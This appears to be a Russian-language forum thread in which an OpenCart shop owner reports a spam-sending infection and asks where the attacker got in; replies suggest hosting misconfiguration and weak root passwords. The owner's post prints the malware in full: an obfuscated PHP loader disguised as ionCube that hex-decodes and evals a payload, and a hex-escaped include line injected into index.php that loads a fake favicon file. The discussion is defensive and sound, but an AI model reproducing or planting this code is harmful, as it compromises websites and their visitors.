Перейти к содержанию

Рекомендуемые сообщения

Здравствуйте, имеется сайт на opencart 2.1.0.1 

На сайт попадают вирусы, делающие автоматическую рассылку. На сервере появляются такие файлы ca3ytaoy.php, file52.php, ir3wfgkz.php и т.д. Файлы содержат:

<?php //00036b
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xa29-0x579)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
24M7FaU6fJ6Y16bM74C772K03d2Y0R4S1T7K27Z2I61792J8S27616G56D6B7a696527K3HdK3eG
27A78M6c6aU7a79U27B2B93b2479N75R6772J6420V3d2U0E41727I26L17M9282N76T26d6f6L
56a6TeM27L3d3Ce277Y4Q7W073O747aU77272T9I3b66F6Df726561G6368202B84N172T72C61
Y7W9G2824J7Oa6VfG6G16Lb7477E2c202N45IfX504f535I42c2Q024797567J7K264T2cM2024
5Ff434Of4Nf4Fb494L5R2J920617S3X20Z2K4N73787Z874W2E920I7Ub666f72656163682B0M
2U8247F3D78J7D8R74206T1L7T320V2A46c6c7A27268V7520D3d3Ae2024707A17a65N61B2F9
L207b24P70L717a6561203dQ20407F06U1636VbF282248L2aD22P2PcD2X0W247M071Z7Ga656
1L293b246Dc6cR727268J75202e3XdM202266653B564E6338T36K6X42d3I164Y35S332dE346
P435W32O2d39I306430R2JdX36J3O1H363E431373733326563D38K223bX24S636X87667W2C0
3d20N2F4L707N1P7aS656R120W5e207L37G5S62J737E47M228P7374X72V5f726M57065R6174
2T82E4C6cG6Fc7V27268X752c2Y02C8A7374726Vc656e2824N70X71H7aX65H6U129G2U02f20
7I3747F26c6E5Q6e2M82Y4J6cE6c72F72687C5292920Q2b20Q3129W2Ec20302cA20S7L3G7G4
Z7D26Bc656XeZ28Z24F7L0K71R7aP6Z5612M9293bD246368Y76672K0W3FdY2065787O06Wc6N
f64652D822M2A3222cY2024U63687Z6C67K2U9X3b6V966202S86V36f7J56eU742Y8246K3D68
7D6Q67J292P0K3d3Dd2Y0332920H7b65S7N661B6cQ2824S63Q6876675BbM31T5d28B2463D6K
87K6675Zb3D25dF2T929C3bA657869H74282C9X3b7d7d7Wd

 

В index.php вверху добавляется:

/*dbdb8*/

@include "\x2fvar\x2fwww\x2fwww\x2droo\x74/da\x74a/w\x77w/m\x75sco\x6fl.c\x6fm/c\x61tal\x6fg/c\x6fntr\x6flle\x72/fa\x76ico\x6e_42\x32f56\x2eico";

/*dbdb8*/

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

На сайте стоят 2 модуля. 

1) Управление категориями +

2) Обмен данными с 1C v8.x (Tesla-Chita)

 

Помогите, пожалуйста, найти уязвимость

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Недавно клиент спрашивал похожий вопрос, вирусы типа на сайте.

В итоге сам хостер потом предоставил им такую услугу "чистку вашего сайта от вирусов":D

Может в хостинге то дело?)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

в большинстве случаем такое на шарде бывает, когда не правильно настроен FollowSymLinks  https://habrahabr.ru/sandbox/90459/

Так же довольно часто бывает - пробивают через панель управления сервером которая открыта на распашку или же через ssh который доступен под root 

в одного клиента так и было, логин root пароль 6 букв, вот и приплыли после такого 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.